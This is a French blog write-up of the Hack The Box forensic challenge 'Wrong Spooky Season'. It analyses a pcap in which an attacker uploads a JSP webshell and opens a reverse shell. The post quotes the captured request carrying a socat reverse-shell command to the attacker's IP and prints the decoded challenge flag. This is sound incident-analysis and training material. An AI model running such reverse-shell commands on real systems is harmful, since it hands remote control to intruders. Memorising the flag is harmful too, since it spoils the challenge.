<!doctype html>
<html lang="en-us">
  <head>
    <title>\[FR\] HTB - Wrong Spooky Season // chrootcommit</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.113.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="chrootcommit" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.1fe426fd82899b3823133b4b6fadb0e1f0d8332eecc710a4dfe43101ac5895e0.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="\[FR\] HTB - Wrong Spooky Season"/>
<meta name="twitter:description" content="HTB - Wrong Spooky Season
Catégorie : Forensic
Enoncé : &ldquo;I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.&rdquo; Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did."/>

    <meta property="og:title" content="\[FR\] HTB - Wrong Spooky Season" />
<meta property="og:description" content="HTB - Wrong Spooky Season
Catégorie : Forensic
Enoncé : &ldquo;I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.&rdquo; Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://chrootcommit.github.io/posts/2023-03-01-hackthebox-wrong_spooky_season/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2023-03-01T00:00:00+00:00" />
<meta property="article:modified_time" content="2023-03-01T00:00:00+00:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://chrootcommit.github.io/"><img class="app-header-avatar" src="/profile.png" alt="chrootcommit" /></a>
      <span class="app-header-title">chrootcommit</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/posts/about">About</a>
            -
          
          <a class="app-header-menu-item" href="/">Home</a>
            -
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Junior Cybersecurity Consultant.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/ChRootCommit" target="_blank" rel="noreferrer noopener me">
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">\[FR\] HTB - Wrong Spooky Season</h1>
      <div class="post-meta">
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Mar 1, 2023
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          2 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <ul>
<li>
<p><a href="https://app.hackthebox.com/challenges/wrong-spooky-season">HTB - Wrong Spooky Season</a></p>
</li>
<li>
<p>Catégorie : Forensic</p>
</li>
<li>
<p>Enoncé : &ldquo;I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.&rdquo; Now there is an internal breach in the <code>Spooky Network</code> and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did.&quot;</p>
</li>
</ul>
<h1 id="introduction">Introduction</h1>
<p>Le challenge se présente sous un fichier pcap contenant le traffic réseau où s&rsquo;est déroulée une cyberattaque. Notre objectif est d&rsquo;enquêter sur le déroulement de l&rsquo;attaque.</p>
<p>Après avoir ouvert le fichier pcap avec wireshark, on peut constater que les trames sont issues des protocols http et tcp.</p>
<p><img src="/HTB_Wrong_Spooky_Season/overview.png" alt=""></p>
<h1 id="les-trames-http">Les trames http</h1>
<p>L&rsquo;ip de l&rsquo;attaquant serait 192.168.1.180 et l&rsquo;ip du serveur ciblé st 192.168.1.166.</p>
<p>En observant les trames http, nous voit que l&rsquo;attaquant a upload via des requêtes POST un webshell sur le serveur cible et a établi par la suite un reverse shell en y injectant une commande socat.</p>
<pre tabindex="0"><code>GET /e4d1c32a56ca15b3.jsp?cmd=socat%20TCP:192.168.1.180:1337%20EXEC:bash HTTP/1.1
Host: 192.168.1.166:8080
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
</code></pre><p>Remarque : Notons l&rsquo;user-agent python-requests/2.28.1, on peut émettre l&rsquo;hypothèse que l&rsquo;attaquant a crée un exploit pour exploiter le serveur 192.168.1.166</p>
<p><img src="/HTB_Wrong_Spooky_Season/http_traffic.png" alt=""></p>
<p>D&rsquo;après la commande exécutée via la requête GET, le port écouté par l&rsquo;attaquant serait le port 1337.
La connectant est établie en tcp, donc on va filtrer sur le port 1337 en tcp.</p>
<h1 id="les-trames-tcp">Les trames tcp</h1>
<p><img src="/HTB_Wrong_Spooky_Season/tcp_traffic.png" alt=""></p>
<p>Etant donné que les échanges à travers le reverse shell ne sont pas chiffré, on peut directement suivre toute la conversation  entre l&rsquo;attaquant et sa cible. (onglet &lsquo;statistic&rsquo; -&gt; &lsquo;conversation&rsquo; -&gt; onglet &lsquo;TCP 1&rsquo; -&gt; &lsquo;Follow Stream&rsquo; )</p>
<p><img src="/HTB_Wrong_Spooky_Season/conv_tcp.png" alt=""></p>
<p>On constate qu&rsquo;à travers une commande, l&rsquo;attaquant reverse les caractères de la chaîne <code>==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS</code>. Cette chaîne doit contenir le flag du challenge si on la met au bon format :</p>
<pre tabindex="0"><code>┌──(kali㉿kali)-[~]
└─$ echo &#34;==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS&#34; | rev
SFRCe2o0djRfNXByMW5nX2p1c3RfYjNjNG0zX2o0djRfc3AwMGt5ISF9Cg==
# Ok ça ressemble à du base64, on va décoder ça!
┌──(kali㉿kali)-[~]
└─$ echo &#34;==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS&#34; | rev | base64 -d
HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}
</code></pre><p>Flag : HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
